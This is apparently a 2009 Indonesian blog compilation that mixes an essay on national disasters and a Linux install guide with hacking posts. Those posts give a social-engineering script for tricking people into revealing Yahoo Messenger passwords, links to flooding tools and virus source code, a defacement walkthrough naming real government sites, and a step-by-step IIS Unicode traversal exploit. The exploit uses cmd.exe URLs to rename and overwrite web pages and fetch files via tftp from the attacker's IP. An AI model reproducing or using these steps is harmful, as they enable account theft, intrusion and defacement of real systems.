Bencana yang datang ke Indonesia mulai dari Tsunami dan gempa bumi di Aceh dan Nias, Pangandaran, Yogyakarta sampai munculnya semburan lumpur di Porong Sidoarjo dan banjir di Morowali. Belum lagi bajir-banjir dan longsor diberbagai kota. Lengkap sudah negeri ini sebagai negeri yang kerap didatangi bencana. Apakah ada gunanya mengeluh atau menyalahkan orang lain tentu sama sekali tidak ada gunanya. Beberapa kawan mengatakan bahwa kita sedang diuji sehingga harus memperbaiki diri dan bangsa sementara yang lainnya mengatakan janganlah mengkait-kaitkan semuanya ini dengan sesuatu yang diluar jangkauan manusia sehingga anggap saja semuanya itu sebagai reaksi alam biasa tidak ada lebih dan kurangnya, sementara seorang anak muda mengatakan bahwa bangsa Indonesia sedang di Azab dan pada setiap kejadian di azab sebuah bangsa tidak akan menyadarinya sampai bangsa atau komunitas tersebut punah seperti yang terjadi pada bengsa-bangsa yang terdahulu. Yidak tahu yang mana yang paling tepat tetapi barangkali yang paling baik , kita memperbaiki diri kita masing-masing sehingga secara bertahap semuanya membaik.

II. Indonesia yang lebih baik.

Darimanakah kita akan memperbaiki negeri ini?. Jawabannya pasti dari diri sendiri. Bagi yang telah berkeluarga mulai lah dilakukan perbaikan dari kelaurga dan rumah masing-masing. Yang paling sederhana tidak butuh biaya adalah kurangi nafsu bagi yang sudah berlebihan dan tingkatkan motivasi serta lebih bersemangat bagi yang kekurangan.

Ketegangan yang sedemikian tinggi sekarang sudah mungkin sampai titik dimana jika terjadi tumbukan sangat mungkin menghasilkan kerusakan yang luar biasa. Seorang tua mengatakan bahwa ketika ia berusia 9 tahun sudah ditugaskan tentara pro kemerdekaan Indonesia untuk mengintai di Pos Cideng dan kejadian berikutnya akibat operasinya terbongkar maka beberapa kawannya “diberondong” mereka berguguran. Ketika itu nyawa juga dipertaruhkan. Saat ini masih banyak terdengar bahwa beberapa atau banyak veteran pejuang hidupnya keleleran dan sengsara? Apakah benar bangsa Indonesa tidak menghargai pejuangnya sehingga para pejuang yang berjasa memerdekakan negerinya saja hidup sengsara, atau apa seperti seorang senior di gerakan mahasiswa yang selalu mengatakan jika bangsa Indonesia tetap begini maka namanya bangsa copet karena copet dan malinglah yang berbahagia karena berharta. Dan selama penoleng berjaya apakah bangsa Indonesia akan terhindar dari malapetaka?.

Setelah berusaha berbuat baik dari diri sendiri dan memuliakan para pejuang kemerekaan dan para orang yang berjasa buat negera republik Indonesia maka buka saluran pendidikan agar jangan anak-anak yang cerdas tidak bisa mendapatkan ilmu apalagi sekolahan hanya menjadi sekedar “tempat investasi” dimana dana yang dikeluarkan harus segera dapat kembali beserta hitungan bunganya. Jangan salahkan sekarang hal inilah yang terjadi. Walau pada saat negara dan masyarakatnya mampu maka sebaiknya pendidikan dihargai mahal juga tidak masalah karena terjangkau masyarakatnya. Pendidikan digratiskan niatnya baik hanya membuat banyak orang tua juga tidak suerius mengurus pendidikan anak-anaknya sebalinya pendidikan sangat mahal juga tidak diharapkan karena yang “pintar tidak punya dana tidak dapat sekolah”, kebijakannya harus diantaranya.

Lapangan kerja sekarang , apa yang paling menjanjikan? Industri bagi Indonesia sudah tertinggal jauh maka bagaimana negera ini memainkan peran antaranya serta menggali keunggulannya apakah dibidang pariwisata dan agrobisnis. Mulai dari cokelat, kelapa sawit dan berbagai tanaman lainnya. Bagaimana jika kita semua memanfaatkan letak geografis Indonesia yang sedemikian strategis dalam lalu lintas dunia?.

Tidak masuk akal negera seluas Indonesia dan penduduknya bukan orang barbar dan bodoh tidak bisa menjadi negara maju?. Terlalu banyak potensi negeri ini disia-siakan.

Kita tentu tidak boleh menyerah walau tahu tidak begitu saja semua persoalan akan berlalu begitu kita coba perbaikinya.

Perubahan pola pikir sangat mungkin menjadi hal yang sangat prioritas untuk terjadi. Jangan lagi hanya pasrah dirumah dan bermain karambol sambil menunggu godot atau tidak juga harus berlaku curang dan menyingkirkan pesaing dan membunuhinya supaya bisa menjadi yang terbaik, terbesar dan terpercaya. Bangsa ini harus lebih terbuka menerima perubahan dan meninggalkan jauh-jauh krinduan untuk ditindas kembali. Kita harus jauh jauh meninggalkan hobby menjadi bangsa yang suka ditindas dan mengundang nya masuk kedalam negeri dengan memberinya karper merah.

Dunia politik yang paling penting sangat mungkin adalah merubah politik intrik sekitar istana menjadi politik kemaslahatan umat. Tetap boleh mempertahankan kekuasaan dan menguntungkan diri sendiri dan keluarga tetapi lebih lagi menghasilkan kemaslahatan bagi bangsa dan negara.

Dari semua itu kelihatannya yang juga sangat penting adalah “soal” keyakinan karena bangsa yang canggih ketika bisa memahami dan merefleksikan keyakinannya akan katuhannannya secara membumi dan canggih. Sebuah bangsa yang hanya berpikir nanti akan ketinggalan di dunia ini begitu juga sebbuah bangsa yang hanya berpikir dan mewujudkan semua yang bersifat kekinian maka hanya akan penuh angkara murka dan keserakahan serta tidak akan menjamin ketertiban dan ketentraman , walaupun diusahakan sekuatnya.

Terlepas dari semua itu yang paling penting sambil menjalankan semua itu hasilkanlah sebuah karya secara minimum setiap harinya sehingga akan terjadi auto reaksi yang sehat dalam tubuh anda dan keluarganya. Tidak ada yang lebih segera harus diwujudkan yaitu berkarya dan berkreasilah segera.

Cara bodoh meminta password YM Orang Lain

2009-08-04T05:38:00.001-07:00

Catatan : Ini bukan software, tp teknik ini lebih di kenal dengan SOCENG / Social Engineering (NGAPUSI, BERDUSTA, BOHONG, NGIBULIN)
Ok, langsung aja.

1. Chat ma calon korban yg mau dicari tahu password YMnya.
2. Basa basi dikit lah. & Saatnya membohongi.
3. Bilang kira2 gini “Aku punya rahasia di YM, lho. Tapi jangan bilang sapa2 yah“
Tar si korban bilang “Apa iya? Apa tuh? Kasi tahu donk…“
4. Jawab “Ok, tapi janji jangan kasi tahu sapa2 yah. Bentar ya, nanti aku ngetik sesuatu“
5. Ketikkin karakter bintang (*) kira2 9-15 karakter di SATU BARIS.
6. Jawab ke korban “Tuh udah aku ketik. Apa yang kamu liat?“
7. Si korban kira2 jawab “Loh itu cuma bintang?“.
8. Jawab “Masa sih? Tadi aku ketikkin passwordku loh.
Hebatnya Yahoo tuh ini, kalo kita ketikkin password,
otomatis diganti bintang.
Pake format /pass:{passwordkita}“
9. Jawab lagi “Coba deh kamu tulis, tar kan keganti bintang“.
10. Si korban jawab “OK“, & mulai ketikkin passwordnya
dengan format /pass:{passwordnya}Skrg passwordnya dia kasi tau ke kamu & tentunya gk ketutup bintang
11. Setelah tahu passwordnya, jangan bilang “Bego banget sih, gitu aja ketipu, wakakakka “,
tapi bilanglah “Tuh kan, di tempatku di sini jadi bintang lho“

Tips tambahan : Sebelum bilang “rahasia YM” itu, kasi tau dulu hidden emoticon YM sebagai rahasia YM lainnya. Jadi pikiran sang korban jd gk fokus..
Daftar emoticon tersembunyi YM : http://messenger.yahoo.com/hiddenemoticons.php

Tool Black YM

2009-08-04T05:32:00.000-07:00

:: YM Rusuh ::

Buat yang mau di tereakin..hahahah !

Preview

Itu baru stadium 1 ngeri nge hank lagi

nak nich hasil pencarian di forum2 nich.........coba ajah deh kalau aku sudah mencobanya !!!mantap.............

DOWNLOAD

Boot And Defense tool YM

2009-08-04T05:30:00.000-07:00

ah mles nich sobat nulis artikel panjang2 nich langsung saya kasih link buat download tool defanse YM oce....... http://boot-yahoo.blogspot.com/2009/02/popcorn-software-booter.html

moga sukses bro.........

tutorial instalasi LINUX buat pemula

2009-08-02T02:39:00.000-07:00

Tutorial ini adalah kelanjutan dari Tutorial Instalasi Dual Boot Linux Windows. Pastikan Anda sudah membacanya sebelum menggunakan tutorial ini. Jika Anda menggunakan instalasi sistem Dual Boot Linux Windows, lewati langkah 1 – 7 yang membahas pembuatan partisi Linux secara manual.

Langkah berikut dipergunakan untuk mempersiapkan partisi yang akan dipergunakan untuk Linux. Ada 3 pilihan yang tersedia :
- Use existing partition : gunakan pilihan ini jika Anda sudah mempunyai partisi Linux didalam komputer.
- Erase and use entire disk : gunakan pilihan ini jika Anda ingin menggunakan partisi yang ada untuk Linux.
- Custom disk partitioning : gunakan pilihan ini jika Anda belum mempunyai partisi Linux atau jika Anda ingin membuat ulang partisi Linux.
Tutorial ini mengasumsikan Anda belum mempunyai partisi Linux, dan ingin membuatnya dengan ukuran yang bisa Anda tentukan sendiri besarnya, sehingga pilihan yang dipergunakan adalah Custom disk partitioning.
Di layar berikutnya terlihat partisi kosong dari harddisk yang akan dipergunakan untuk Linux.
Kotak berwarna merah atau coklat menandakan sebagai partisi Linux, kotak berwarna hijau menandakan sebagai partisi swap Linux, kotak berwarna biru menandakan sebagai partisi Windows, sedang kotak lainnya adalah partisi dari file sistem lain atau partisi kosong.

Anda perlu membuat minimal 2 partisi, yaitu partisi swap dan partisi root /. Jika diperlukan Anda juga bisa membuat partisi khusus untuk data di partisi /home.
Partisi pertama yang akan kita buat adalah partisi swap. Partisi swap adalah suatu partisi yang diperlukan sebagai memori virtual. Ukuran partisi swap sebaiknya dua kali ukuran memori. Sebagai misal, memori di komputer besarnya 512 Mb, maka buatlah partisi swap sebesar 1024 Mb (1 Gb).Untuk membuat partisi swap, pada layar sebelumnya, kliklah tombol Create. Kemudian tentukanlah ukuran partisi yang akan dipergunakan untuk swap.Klik tombol OK.
Partisi swap sudah terbuat dan ditandai dengan warna hijau.
Berikutnya … jika diperlukan Anda bisa membuat partisi /home untuk memisahkan data dari partisi utama Linux. Anda bisa mempergunakan file sistem Linux ataupun file sistem Windows untuk partisi ini. Partisi /home selain digunakan untuk tempat penyimpanan data User juga digunakan oleh beberapa program untuk meletakkan file konfigurasinya. Sesuaikanlah ukuran partisi /home dengan kapasitas harddisk Anda. NB: Jika Anda bermaksud menggunakan Wine untuk menginstal program2 berbasis Windows, pastikanlah untuk memperbesar ukuran partisi /home, karena nantinya semua program Windows akan diinstal di partisi ini.Untuk membuat partisi /home:
- Kliklah partisi kosong disamping partisi swap.
- Klik tombol Create.
- Tentukan ukuran yang akan dipergunakan untuk partisi /home.
- Pada kotak Filesystem type, pilihlah salah satu pilihan file sistem yang tersedia.
  Gunakan pilihan fat jika Anda ingin partisi ini bisa dibaca juga dari Windows.
- Pada kotak Mount point pilihlah /home.
Sekarang sudah ada dua partisi: swap dan /home.

Tiba waktunya sekarang untuk membuat partisi utama sistem Linux, yaitu partisi root /. Partisi ini harus menggunakan file sistem Linux, anda tidak bisa menggunakan file sistem FAT atau NTFS milik Windows.
Untuk instalasi 3D OS versi CD, minimal sediakanlah 3 Gb. Sedang untuk versi DVD, sediakanlah minimal 8 Gb. Pastikan Anda menyediakan ekstra ruang jika nantinya ingin menginstal program-program lain.

Untuk membuat partisi root :
- Klik partisi kosong disamping partisi /home.
- Klik tombol Create.
- Tentukan ukuran yang akan dipergunakan untuk partisi root.
- Pada kotak Filesystem type, pilihlah salah satu pilihan file sistem yang tersedia.
  Gunakan pilihan fat jika Anda ingin partisi ini bisa dibaca juga dari Windows.
- Pada kotak Mount point pilihlah /.
Sekarang partisi Anda sudah lengkap. Klik tombol Done untuk melanjutkan ke proses pemformatan partisi.
Peringatan untuk memformat partisi harddisk muncul di layar. Klik tombol Next jika Anda sudah yakin akan melanjutkan ke proses format partisi.
Setelah proses format selesai, saatnya untuk menginstal file-file dari CD/DVD ke harddisk.

Klik tombol Next untuk memulai proses instalasi program-program Linux.
Setelah proses instalasi selesai, Anda perlu membuat boot menu.
Defaults boot menu menggunakan sistem GRUB. Jika ini satu-satunya Linux yang ada di harddisk, Anda bisa memilih untuk menginstall boot menu di MBR atau Master Boot Record. Jika Anda sudah mempunyai Linux lain, Anda bisa memilih untuk menginstal boot menu di partisi untuk dikaitkan dengan partisi Linux lainnya.
Berikut ini adalah daftar pilihan boot yang dibuat secara default.

Jika Anda mempunyai Linux lainnya, Anda bisa menambahkannya disini. Jika Anda mempunyai sistem Windows, secara otomatis menu untuk boot ke Windows akan dibuatkan.
Proses instalasi sudah selesai, dan kini Anda perlu memboot ulang komputer. Nantinya pada menu boot Anda bisa memilih apakah akan masuk ke Windows atau Linux.

Selamat menggunakan Linux !

PENTING :
Jika dalam proses instalasi Anda menemui kegagalan, cobalah untuk menginstal melalui mode teks.

Klik menu Start > System > Terminals > Konsole
Ketikkan su
Masukkan password root.
Ketikkan draklive-install

Lakukan proses instalasi sesuai petunjuk di layar dan perhatikan pesan kesalahan yang muncul di layar terminal.

Hacking Tools (2)

2009-07-30T04:57:00.001-07:00

(Ezine Echo lama, Tutor lengkap Jasakom lama)
- Download kumpulan tutor dan artikel - 3
(Artikel, Astronomi, BaliHack, Cyber Samarinda, ICT, IndoProg, IndoSecure, LinuxBali, LinuxJakarta, LinuxLainnya, Newbies, PakTani dan lainnya)
- Download kumpulan tutor dan artikel - 4
(Tutor tembak ip, Jasakom tutor baru, Unicode tutor)

Bonus tutor :
- Tutor cara melakukan deface pada web
(Deface situs PHPNuke, Deface situs asp/IIS dgn tools Exploit, deface situs asp/IIS dgn SQL Injection, deface situs asp/IIS dgn menggunakan Windows 98, deface situs php dgn SQL Injection, deface situs php dgn SQL Injection II, deface guestbook (buku tamu), deface guestbook (buku tamu) 2 , deface Forum PhpBB2, deface Forum PhpBB2 II, deface guestbook pakai pic, deface situs php nuke, deface melalui showpage.cgi, Hacking Forum Phphbb v.phpBB-2.0.5, PHP-NUKE-BUGS).
- Tutor lengkap cara bermain di shell target
(pasang backdoor, pasang bindtty, belajar NgeRoot, Cracking Root, langkah-langkah bikin PSYBNC I dan II danlangkah-langkah bikit BOT I dan II).
- Cara masuk komputer orang lain dengan W32/Romdil (disertakan toolsnya)
- Menjebol Password Network Neigborhoud
- Mengenai Ngembom E-Mai Lewat E-Mail

Download THE ART OF INTRUSION
- Download E-book The Art of Intrusion (disk 1)
- Download E-book The Art of Intrusion (disk 2)

Download berbagai macam bahasa pemograman
- Download LCC untuk exploit di Windows
- Download ActivePerl untuk exploit di Windows
- Download Python untuk exploit di Windows
- Download bahasa pemograman QBASIC
- Download bahasa pemograman Turbo Pascal 7.0
- Download bahasa pemograman Turbo Basic
- Download bahasa pemograman Turbo Assembler
- Download bat2com

Download Turbo C :
- Download bahasa pemograman Turbo C Disk 1
- Download bahasa pemograman Turbo C Disk 2
- Download bahasa pemograman Turbo C Disk 3
- Download bahasa pemograman Turbo C Disk 4
- Download bahasa pemograman Turbo C Disk 5
- Download bahasa pemograman Turbo C Disk 6

Download Visual Basic for DOS
- Download Visual Basic for DOS (Disk 1)
- Download Visual Basic for DOS (Disk 2)
- Download Visual Basic for DOS (Disk 3)
- Download Visual Basic for DOS (Disk 4)
- Download Visual Basic for DOS (Disk 5)

Download Source Code Virus (Assembler)
- Download Paket Source code membuat virus komputer (Segala ekstensi) [DISK 1]
- Download Paket Source code membuat virus komputer (Ekstensi *.ASM) [DISK 2]
- Download Paket Source code membuat virus komputer (*.SCR & *.DOC) [DISK 3]
- Download Paket Source code membuat virus komputer (Ekstensi *.TXT) [DISK 4]

blog hack

2009-07-30T04:35:00.000-07:00

Deface/Defacing atau cyber grafity secara umum diartikan sebagai aktifitas menodai atau
merubah ubah isi suatu halaman web dengan kalimat , image atau link tertentu yang tidak
ada sangkut pautnya dengan misi web tersebut , Biasanya hacker men-deface suatu
halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.
Mungkin anda pernah dengar atau pernah mengunjungi suatu web yang terkena deface
seperti :

http://www.bandaaceh.go.id
http://www.pertamina.co.id
http://www.transtv.co.id
http://www.setkab.go.id
http://www.pom.go.id
http://www.usni.ac.id

Ternyata apabila kita perhatikan target target tersebut dengan seksama , para target
mempunyai kesamaan yaitu server web tersebut berjalan di Operating System Windows
2000 dan servernya adalah IIS 5.0/6.0.

Mungkin anda beranggapan bahwa deface server server web tersebut adalah hal yang
susah dan perlu waktu yang lama untuk menyusup ke server tersebut , ternyata hal
tersebut adalah mudah semudah copy dan paste , silahkan ikuti langkah langkah berikut ,
dalam hal ini gw menggunakan contoh penggunaan web folder pada Windows xp

1. Buatlah suatu halaman web seperti dibawah ini atau terserah anda dengan
menggunakan tool/software terserah anda seperti Frontpage , Macromedia , Note
pad dan lain lain

2. Beri nama halaman web tersebut dengan index.html / index.asp / default.html /
default.asp atau nama lain tergantung nama file halaman pertama suatu web
terbuka atau nama terserah anda apabila hanya mau menyimpan file tersebut di
suatu web

3. Buka My computer pada desktop dan lihat icon web folder

4. Klik 2 kali pada icon web folder tersebut

5. klik 2 kali pada icon add web folder

6. Isikan URL target di popup yang muncul misalkan target kita adalah
http://www.pertamina.co.id maka isikan URL tersebut

7. klik next lalu finish

8. Klik 2 kali pada folder yang terbentuk dan anda akan melihat isi folder tersebut
dengan file file yang akan tampil pada halaman web apabila kita mengunjungi
web tersebut

9. rubah nama file pembuka web tersebut (biasanya nama file index.html atau
index.asp) dengan nama file lain seperti index_old.asp atau terserah anda ,
biasakan hal ini anda lakukan karena kita tidak bermaksud untuk merusak isi web
milik orang lain , hanya mengingatkan.

10. Copy dan paste-kan halaman web yang anda buat tadi di folder web folder yang
telah kita buat

11. Save di komputer anda.

12. Proses Deface selesai.

Untuk pembelajaran silahkan anda cari web site yang masih vurn dengan menggunakan
google searching ketikan keyword dengan kunci “allinurl:*.asp” atau apabila mau
mencari situs pemerintah ketikan keyword “web: .go.id”
Untuk para administrator web site , download-lah patch bug tersebut untuk menghindari
terjadinya deface yang sangat mudah ini dengan demikian untuk para defacer yang
hendak coba coba deface dengan cara ini dan prosesnya gagal , sudah dipastikan web siteyang hendak anda deface sudah tidak vurn lagi atau sudah di-patch.

Cara Deface Website

2009-07-30T04:33:00.000-07:00

"Resiko Ditanggung Masing - Masing". Pada posting ini kita coba membahas "deface website" apa itu ?? Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya ilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo sob adalah web master dan sob ngerubah tampilan halaman situs yang sob punya tentu saja itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kalian ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan deface diantara kedua OS tsb. Operating System atau OS biasanya kalo kita kelompikin ke 2 keluarga besar,yaitu :

1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

elalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! gn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah
kowe.....Lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg
bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering kita gunakan ehehhehehhee...contoh:

http://wwwtargethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server
target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL
diatas menjadi empat bagian yaitu :
· Bagian host, yaitu "http://www.targethost.com"
· Bagian exploit string, yaitu "/scripts/..%255c..%255c"
· Bagian folder, yaitu "/winnt/system32/"
· Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\" atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah :
C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih. lagehh... .hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah..... truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah... contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnyah*)

Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..Kedua lewat TFTP32.

*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe

Pasti hasilnya akan seperti di bawah ini :

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
1 file(s) copied.

Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.

Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :

dapat dilihat disini
Kita liat apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi

Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian :

Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c

Bagian command yaitu, cmdku.exe?/c+echo+

Bagian HTML

Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu,
C:\InetPub\wwwroot\main.html

Cara Kedua Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya :

http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe
up-load)+ C:\InetPub\wwwroot\main.html

Kita liat lagi apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi.

Sayah akan uraikan juga URL tadee menjadi 4 bagian :

Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c

Bagian folder, yaitu /winnt/system32/

Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+

Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu,
C:\InetPub\wwwroot\main.html

Kekurangannyah dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.

Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini.

--------------------------------------------END--------------------------------------------------

Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2 cyber underground...hehehehe "yang kreatif donk..!!"

Okeh sekrang kita ke UNIX yah...di unix sendiri yang perlu dilakukan untuk men-deface situs adalah memperoleh fasilitas root dari server tsb. Cara memperoleh fasilitas root tentu saja melalui exploit (mengenai masalah exploit bisa kalian lihat di bagian "Hacking Shell"). Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas root dari exploit "SSH CRC32 Exploit", exploit ini ditujukan pada SSH server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured to drop back to protocol 1 Ketika berjalan exploitnya akan bekerja seperti ini :

[root@juventini]# ./x10 -t1 192.168.1.120

password:

Target: Small - SSH-1.5-1.2.26

Attacking: 192.168.1.120:22
Testing if remote sshd is vulnerable # ATTACH NOWYES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
